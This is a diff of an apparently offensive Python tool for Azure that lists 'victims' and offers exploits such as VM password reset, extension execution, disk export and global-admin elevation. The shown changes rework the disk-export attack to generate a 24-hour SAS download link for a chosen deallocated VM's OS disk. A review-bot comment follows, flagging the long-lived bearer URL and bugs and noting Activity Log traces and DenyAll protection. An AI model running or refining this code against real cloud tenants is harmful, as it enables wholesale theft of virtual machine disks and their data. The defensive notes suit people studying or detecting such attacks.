| skipped 285 lines |
286 | 286 | | item['resourceGroup'] = res['name'] |
287 | 287 | | result.append(item) |
288 | 288 | | return result |
289 | | - | def CON_GenerateVMDiskSAS(subscriptionId, resourceGroupName, vmDiskName): |
| 289 | + | def CON_GenerateVMDiskSAS(subscriptionId, resourceGroupName, vmDiskName, location): |
290 | 290 | | global Token |
291 | 291 | | headers = { |
292 | 292 | | 'Content-Type': 'application/json', |
293 | 293 | | 'Authorization': 'Bearer ' + Token |
294 | 294 | | } |
295 | | - | rs = requests.get("https://management.azure.com/subscriptions/"+subscriptionId+"/resourceGroups/"+resourceGroupName+"/providers/Microsoft.Compute/disks/"+vmDiskName+"/beginGetAccess?api-version=2021-12-01", |
| 295 | + | rs = requests.post("https://management.azure.com/subscriptions/"+subscriptionId+"/resourceGroups/"+resourceGroupName+"/providers/Microsoft.Compute/disks/"+vmDiskName+"/beginGetAccess?api-version=2022-03-02", |
296 | 296 | | json={ |
297 | | - | "access": "Read", |
298 | | - | "durationInSeconds": 300 |
| 297 | + | "access": "read", |
| 298 | + | "durationInSeconds": 86400 |
299 | 299 | | }, |
300 | 300 | | headers=headers) |
301 | | - | if rs.status_code == 200: |
302 | | - | DownloadURL = rs.json()['access'] |
303 | | - | return "Ready! SAS Download Link for " + vmDiskName + ": " + DownloadURL |
| 301 | + | |
| 302 | + | if rs.status_code == 202: |
| 303 | + | rsAsync = requests.get(str(rs.headers['Location']),headers=headers) |
| 304 | + | return "Disk Ready! The SAS Download For the next 24 hours (Disk:" + vmDiskName + "): " + rsAsync.json()['accessSAS'] |
304 | 305 | | else: |
305 | | - | return "Unable to create SAS Download Link." |
| 306 | + | return "Failed to generate SAS link for Disk." |
306 | 307 | | |
307 | 308 | | def CON_VMExtensionExecution(subscriptionId, location, resourceGroupName, vmName, PayloadURL): |
308 | 309 | | global Token |
| skipped 445 lines |
754 | 755 | | "Contributor/VMExtensionResetPwd", |
755 | 756 | | "Contributor/VMExtensionExecution", |
756 | 757 | | "Contributor/VMDiskExport", |
757 | | - | "Contributor/VMDiskSnapshotExport", |
758 | 758 | | "GlobalAdministrator/elevateAccess" |
759 | 759 | | ] |
760 | 760 | | readline.set_completer(SimpleCompleter(exploits).complete) |
| skipped 327 lines |
1088 | 1088 | | CmdFileContent = f.read() |
1089 | 1089 | | print(CON_VMRunCommand(victims[Selection]["subId"],victims[Selection]["rg"],victims[Selection]["os"],victims[Selection]["name"], CmdFileContent)) |
1090 | 1090 | | elif "Contributor/VMDiskExport" in ExploitChoosen and mode == "run": |
1091 | | - | print("Trying to list offline virtual machines.. (it might take a few minutes)") |
| 1091 | + | print("Trying to list deallocated virtual machines.. (it might take a few minutes)") |
1092 | 1092 | | victims = {} |
1093 | 1093 | | AllVMRecords = PrettyTable() |
1094 | 1094 | | AllVMRecords.align = "l" |
| skipped 1 lines |
1096 | 1096 | | AllVMRecordsCount = 0 |
1097 | 1097 | | for UserVMRecord in RD_ListAllVMs(): |
1098 | 1098 | | VMState = HLP_GetVMInstanceView(UserVMRecord['subscriptionId'],UserVMRecord['resourceGroup'],UserVMRecord['name']) |
| 1099 | + | if VMState != "PowerState/deallocated": |
| 1100 | + | continue |
1099 | 1101 | | victims[AllVMRecordsCount] = {"name": UserVMRecord['name'], "location": UserVMRecord['location'], "diskName": UserVMRecord['properties']['storageProfile']['osDisk']['name'],"subId": UserVMRecord['subscriptionId'],"rg": UserVMRecord['resourceGroup']} |
1100 | 1102 | | AllVMRecords.add_row([AllVMRecordsCount, UserVMRecord['name'], UserVMRecord['location'], UserVMRecord['properties']['storageProfile']['osDisk']['name'], VMState]) |
1101 | 1103 | | AllVMRecordsCount += 1 |
| skipped 1 lines |
1103 | 1105 | | TargetVM = input("Select Target DiskVM [i.e. 1]: ") |
1104 | 1106 | | print("Create a SAS link for VHD download...") |
1105 | 1107 | | Selection = int(TargetVM) |
1106 | | - | print(CON_GenerateVMDiskSAS(victims[Selection]["subId"], victims[Selection]["rg"], victims[Selection]["diskName"])) |
| 1108 | + | print(CON_GenerateVMDiskSAS(victims[Selection]["subId"], victims[Selection]["rg"], victims[Selection]["diskName"], victims[Selection]["location"])) |
1107 | 1109 | | |
1108 | 1110 | | elif "Contributor/VMExtensionExecution" in ExploitChoosen and mode == "run": |
1109 | 1111 | | print("Trying to list exposed virtual machines.. (it might take a few minutes)") |
| skipped 114 lines |
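Review bot: The `durationInSeconds` change from 300 to 86400 in `CON_GenerateVMDiskSAS` (new line 298) turns the returned SAS into a day-long bearer URL for a whole OS disk, and new line 304 returns it inside a string that the caller prints to the terminal, so it ends up in scrollback and session logs. For an authorised assessment the lifetime should stay as short as the download needs, with the reason documented, e.g. `# SAS URL is a bearer secret: keep the lifetime minimal and revoke access when done`. The new `location` parameter is never read in the visible body, and `rsAsync.json()['accessSAS']` is unguarded, so a response without that key raises instead of reaching the failure message. On the defensive side, this request is recorded in the Azure Activity Log as a `Microsoft.Compute/disks/beginGetAccess/action` operation, and disks whose `networkAccessPolicy` is `DenyAll` cannot be exported this way.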